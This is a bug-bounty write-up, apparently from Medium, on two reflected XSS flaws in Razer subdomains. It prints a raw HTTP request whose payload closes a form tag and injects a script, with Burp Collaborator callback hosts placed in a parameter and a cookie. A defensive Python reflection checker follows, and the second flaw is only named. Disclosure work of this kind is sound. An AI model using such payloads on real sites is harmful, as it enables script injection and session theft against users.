2 Reflected XSS In Razer

First of all, thanks for reading my first write-up on Medium.

My name is Mostafa. I am working as an information security engineer, and in my part time I do some bug hunting.

I found 2 vulnerabilities in different subdomains of Razer.

The first one is a reflected XSS in (http://drivers.razersupport.com).

When I was searching for XSS, I looked at the reflected params. I found that the CSRF token had been reflected and commented in the HTML response, so this is the first one: I just closed the form tag and wrote an XSS payload, and it was executed.

GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →”></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1
Host: drivers.razersupport.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SWIFT_sessionid40=59cpx8mzpt0t559zefhsfxe7eykq8f.burpcollaborator.net; _gcl_au=1.1.291319320.1592845997; __utma=124197257.1459569068.1592845998.1592845998.1592845998.1; __utmc=124197257; __utmz=124197257.1592845998.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; __utmb=124197257.1.10.1592845998; _ga=GA1.2.1459569068.1592845998; _gid=GA1.2.741943482.1592845999; __unam=c0300f2-172dd050e1d-36a23205-2; _dc_gtm_UA-33485401-2=1
Connection: close
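
The first finding comes down to a request value being echoed into the HTML response without output encoding, inside a comment. The following is an added example, not code from the original write-up or from Razer: a regression check that sends a harmless marker through a page renderer and reports where it comes back unencoded. The markup, the token format and the names render_vulnerable, render_hardened and reflection_contexts are assumptions made for the illustration.

```python
import html
import re
from html.parser import HTMLParser

# Harmless marker carrying the characters that let a value leave its context.
PROBE = "zq9\"'<>x"

def render_vulnerable(token):
    # Constructed stand-in for the flaw: request data echoed raw into a comment.
    return f'<form action="/index.php">\n<!-- token: {token} -->\n</form>'

def render_hardened(token):
    # Accept only the expected token shape (assumed here to be 16-64
    # alphanumerics), keep it out of comments, and attribute-encode it.
    if not re.fullmatch(r"[A-Za-z0-9]{16,64}", token):
        token = ""
    value = html.escape(token, quote=True)
    return ('<form action="/index.php">\n'
            f'<input type="hidden" name="csrf" value="{value}">\n</form>')

class _Finder(HTMLParser):
    """Records the markup nodes that contain the probe in raw form."""
    def __init__(self, probe):
        super().__init__()
        self.probe, self.hits = probe, []

    def handle_comment(self, data):
        if self.probe in data:
            self.hits.append("comment")

    def handle_starttag(self, tag, attrs):
        # get_starttag_text() is the tag as sent, before entity decoding.
        if self.probe in self.get_starttag_text():
            self.hits.append(f"tag:{tag}")

def reflection_contexts(body, probe=PROBE):
    """Return where the probe is reflected without output encoding."""
    if probe not in body:      # encoded, stripped or rejected
        return []
    finder = _Finder(probe)
    finder.feed(body)
    finder.close()
    # Raw in the body but in neither node type: text or another context.
    return finder.hits or ["elsewhere"]

if __name__ == "__main__":
    print(reflection_contexts(render_vulnerable(PROBE)))
    print(reflection_contexts(render_hardened(PROBE)))
```

A non-empty result for any parameter is a finding to fix at the rendering layer; an HTML comment is not a safe place to echo request data.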

The second reflected XSS (auth.pay.razer.com)

Good advice: test all reflected inputs and don't use automation tools to find XSS.

All issues are mitigated.

Thanks

Information Security Engineer And Bug Hunter
